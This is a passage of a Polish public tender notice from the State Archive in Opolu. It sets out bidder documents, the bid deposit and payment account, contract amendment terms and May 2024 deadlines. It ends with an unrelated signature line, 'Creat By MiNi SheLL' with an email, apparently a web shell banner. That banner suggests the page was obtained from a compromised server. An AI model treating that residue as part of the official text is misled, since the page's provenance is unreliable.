poz. 1995), o której mowa w rozdz. C pkt 5 lit. b) SWZ,<br/>b)	dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia przynajmniej na sumę gwarancyjną określoną przez Zamawiającego w rodz. C pkt 5 lit. c) SWZ,<br/>c)	wykaz wykonanych usług w zakresie niezbędnym do potwierdzenia spełniania warunku udziału w postępowaniu określonego przez Zamawiającego w rozdz. C pkt 5 lit. d) SWZ - z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane (druk wykazu stanowi Załącznik nr 6 do SWZ),<br/>d)	dowody określające, czy usługi zawarte w wyżej wymienionym wykazie zostały wykonane należycie. Dowodami są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego usługi były wykonywane lub są wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać tych dokumentów – oświadczenie Wykonawcy.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Wykonawca zobowiązany jest wnieść wadium w wysokości 20.000,- (słownie: dwadzieścia tysięcy 00/100) zł. <br/> 2. Wadium może być wniesione w jednej lub kilku następujących formach:<br/>1) pieniądzu;<br/>2) gwarancjach bankowych;<br/>3) gwarancjach ubezpieczeniowych;<br/>4) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (tekst jedn. Dz.U. z 2024 r., poz. 419). <br/>3. W przypadku składania przez Wykonawcę wadium w formie gwarancji lub poręczeń, powinny być one bezwarunkowe, nieodwołalne i płatne na pierwsze pisemne żądanie Zamawiającego, wykonalne na terytorium Rzeczypospolitej Polskiej, sporządzone zgodnie z obowiązującym prawem i winny zawierać następujące elementy:<br/>1)	nazwę dającego zlecenie (Wykonawcy), beneficjenta gwarancji/poręczenia (Zamawiającego), gwaranta/poręczyciela (banku lub instytucji ubezpieczeniowej udzielających gwarancji/poręczenia) oraz wskazanie ich siedziby;<br/>2)	określenie wierzytelności, która ma być zabezpieczona gwarancją (poręczeniem);<br/>3)	kwotę gwarancji (poręczenia);<br/>4)	termin ważności gwarancji (poręczenia);<br/>5)	zobowiązanie gwaranta do zapłacenia kwoty gwarancji (poręczenia) na pierwsze pisemne żądanie Zamawiającego zawierające oświadczenie, iż:<br/>a) Wykonawca, którego ofertę wybrano:<br/>- odmówił podpisania umowy na warunkach określonych w ofercie, lub<br/>- nie wniósł zabezpieczenia należytego wykonania umowy, lub<br/>- zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie Wykonawcy,<br/>lub<br/>b) Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 107 ust. 2 lub art. 128 ust. 1 PZP, z przyczyn leżących po jego stronie, nie złożył podmiotowych środków dowodowych lub przedmiotowych środków dowodowych potwierdzających okoliczności, o których mowa w art. 57 lub art. 106 ust. 1 PZP, oświadczenia, o którym mowa w art. 125 ust. 1 PZP, innych dokumentów lub oświadczeń lub nie wyraził zgody na poprawienie omyłki, o której mowa w art. 223 ust. 2 pkt 3 PZP, co spowodowało brak możliwości wybrania oferty złożonej przez wykonawcę jako najkorzystniejszej.<br/>4. Wadium wnoszone w pieniądzu należy wnieść przelewem na rachunek bankowy Archiwum Państwowego w Opolu: NBP O/Okręgowy w Opolu<br/>nr 47 1010 1401 0015 3113 9120 0000 z dopiskiem: „wadium w postępowaniu nr DAG.261.1.2024” - przy czym winno ono wpłynąć - w rozumieniu uznania rachunku bankowego - na wskazany powyżej rachunek bankowy Zamawiającego przed upływem terminu składania ofert. <br/>5. Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia, o których mowa w pkt 2 ppkt 2-4 powyżej, Wykonawca przekazuje Zamawiającemu oryginał gwarancji lub poręczenia, w postaci elektronicznej jako załącznik do oferty Wykonawcy.<br/>6. Wadium winno obejmować cały okres związania ofertą.<br/>7. Zamawiający zwraca wadium niezwłocznie, nie później jednak niż w terminie 7 dni od dnia wystąpienia jednej z okoliczności: <br/>1) upływu terminu związania ofertą;<br/>2) zawarcia umowy w sprawie zamówienia publicznego;<br/>3) unieważnienia postępowania o udzielenie zamówienia, z wyjątkiem sytuacji, gdy nie zostało rozstrzygnięte odwołanie na czynność unieważnienia albo nie upłynął termin do jego wniesienia.<br/> 8. Zamawiający, niezwłocznie, nie później jednak niż w terminie 7 dni od dnia złożenia wniosku zwraca wadium Wykonawcy:<br/>1) który wycofał ofertę przed upływem terminu składania ofert;<br/>2) którego oferta została odrzucona;<br/>3) po wyborze najkorzystniejszej oferty, z wyjątkiem wykonawcy, którego oferta została wybrana jako najkorzystniejsza;<br/>4) po unieważnieniu postępowania, w przypadku gdy nie zostało rozstrzygnięte odwołanie na czynność unieważnienia albo nie upłynął termin do jego wniesienia.<br/>Pozostałe informacje dot. wadium zgodnie z rozdziałem L pkt 9-13 SWZ. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Oświadczenie Wykonawcy o niepodleganiu wykluczeniu z postępowania w przypadku wspólnego ubiegania się o zamówienie przez kilku Wykonawców, oświadczenie o niepodleganiu wykluczeniu składa odrębnie każdy z Wykonawców. Oświadczenie o spełnianiu warunków udziału w postępowaniu o spełnieniu warunków udziału w postępowaniu w przypadku wspólnego ubiegania się o zamówienie przez kilku Wykonawców, oświadczenie o spełnianiu warunków udziału w postępowaniu składa każdy z Wykonawców w zakresie, w którym wykazuje spełnianie warunków udziału w postępowaniu.<br/>W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia przedłożone dowody - w odniesieniu do zdolności technicznej lub zawodowej /rozdz. C pkt 5 lit. d), e) i f) SWZ/ - powinny potwierdzać łącznie spełnienie w/w warunku przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia, zaś - w odniesieniu do kompetencji lub uprawnień do prowadzenia określonej działalności zawodowej oraz sytuacji finansowej lub ekonomicznej /rozdz. C pkt 5 lit. b) i c) SWZ/ powinny potwierdzać spełnienie w/w warunku samodzielnie przez każdego z Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>UWAGA:<br/>Zamawiający żąda od Wykonawcy samodzielnego (osobistego) wykonania przedmiotu zamówienia własnymi zasobami Wykonawcy (tzn. w oparciu o własne zdolności techniczne lub zawodowe polegając na własnej sytuacji finansowej lub ekonomicznej Wykonawcy), przy czym warunek ten uznaje się za spełniony także w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia. Zamawiający nie dopuszcza wykonania zamówienia lub jego części przy udziale podwykonawców /podmiotów trzecich/. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zmiana postanowień zawartej umowy może nastąpić w formie aneksu za zgodą obu stron wyrażoną - pod rygorem nieważności - na piśmie.<br/>2. Strony dopuszczają możliwość zmiany postanowień zawartej umowy w stosunku do treści złożonej oferty jedynie w razie:<br/>- zmiany przepisów powodujących konieczność zastosowana innych rozwiązań organizacyjnych lub funkcjonalnych ochrony, niż zakładano w opisie przedmiotu zamówienia lub SWZ i/lub związanej z tym konieczności zlecenia usług dodatkowych w trybie zgodnym z przepisami ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych (tekst jedn. Dz. U. z 2023 r. poz. 1605 z późn. zm.);<br/>- zmiany Planu Ochrony Archiwum Państwowego w Opolu;<br/>-	zmiany stawki podatku VAT, przy czym zmianie ulegnie wyłącznie cena brutto, a wartość netto pozostanie bez zmian;<br/>-	zmiany wysokości minimalnego wynagrodzenia za pracę (w rozumieniu minimalnej stawki godzinowej) obowiązującego w kolejnych latach kalendarzowych okresu obowiązywania umowy (2025, 2026 i 2027) - w takim przypadku wynagrodzenie Wykonawcy, o którym mowa w §4 ust. 2 lit. a) umowy, ulegnie zmianie (podwyższeniu) o procentowy wskaźnik wzrostu minimalnego wynagrodzenia (w rozumieniu minimalnej stawki godzinowej) obowiązującego w kolejnym roku w stosunku do minimalnego wynagrodzenia (w rozumieniu minimalnej stawki godzinowej) obowiązującego w roku poprzedzającym taka zmianę /począwszy od 2025 r./ - ze skutkiem do wynagrodzenia należnego Wykonawcy odpowiednio za przyszłe okresy 01/01/2025-31/12/2025, 01/01/2026-31/12/2026 oraz 01/01/2027-30/11/2027 (art. 455 ust. 1 pkt 1 ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych);<br/>- ograniczenia zakresu usług świadczonych przez Wykonawcę wobec braku odpowiednich środków finansowych na realizację zadania przyznawanych corocznie w ramach budżetu przez dysponenta właściwego stopnia,<br/>- w każdym przypadku, gdy zmiana leży w interesie Zamawiającego, a nie można jej było przewidzieć w chwili zawierania umowy.<br/>3. Nie stanowi zmiany umowy:<br/>a)	zmiana danych stron (np. adresu, siedziby lub nazwy), <br/>b) zmiana danych związanych z techniczno-administracyjną obsługą realizacji umowy (np. zmiana numeru rachunku bankowego),<br/>c) zmiana przedstawicieli wskazanych w §8 niniejszej umowy,<br/>d) zmiana osób posiadających wymagane kwalifikacje do świadczenia usług z ramienia Wykonawcy skierowanych do realizacji przedmiotowego zamówienia - pod warunkiem zachowania postanowień SWZ i zapewnienia zgodności z przepisami ustawy z dnia 22 sierpnia 1997 r. o ochronie osób i mienia (tekst jedn. Dz.U. z 2021 r. poz. 1995).<br/>4. Wykonawca nie może bez pisemnej zgody Zamawiającego dokonać cesji jakichkolwiek praw i obowiązków związanych z realizacją niniejszej umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-05-08 10:30</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">1. Wykonawca składa ofertę za pośrednictwem platformy elektronicznej zlokalizowanej pod adresem https://opole-ap-gov-pl.logintrade.net</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-05-08 12:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-06-06</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1.	Zamawiający żąda od Wykonawcy samodzielnego (osobistego) wykonania przedmiotu zamówienia (własnymi zasobami Wykonawcy tzn. w oparciu o własne zdolności techniczne lub zawodowe polegając na własnej sytuacji finansowej lub ekonomicznej Wykonawcy). <br/>Warunek ten uznaje się za spełniony także w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia. <br/>Zamawiający nie dopuszcza wykonania zamówienia lub jego części przy udziale podwykonawców /podmiotów trzecich/ - zastrzeżenie to nie dotyczy Wykonawców wspólnie ubiegających się o udzielenie zamówienia.

Creat By MiNi SheLL
Email: jattceo@gmail.com